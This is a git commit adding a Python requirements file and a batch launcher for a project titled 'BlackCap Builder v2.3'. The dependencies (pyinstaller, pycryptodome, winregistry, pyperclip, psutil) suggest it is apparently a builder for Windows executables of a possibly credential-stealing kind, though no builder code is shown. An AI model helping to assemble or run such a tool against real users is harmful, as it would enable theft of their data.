Add files via upload

This commit is contained in:
SupraKSCH 2023-03-15 00:22:07 +01:00 committed by GitHub
parent 3b27570ba5
commit 76e67d23ff
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
2 changed files with 25 additions and 0 deletions

21
requirements.txt Normal file
View File

@ -0,0 +1,21 @@
httpx
pyperclip
pyotp
asyncio
winregistry
psutil
pypiwin32==223
pycryptodome
pyinstaller>=5.0
PIL-tools
asyncio
threaded
requests
datetime
colorama
pillow
customtkinter
pycryptodome
pyperclip
pyfiglet
tqdm

4
start.bat Normal file
View File

@ -0,0 +1,4 @@
@echo off
title BlackCap Builder v2.3
python builder.py
pause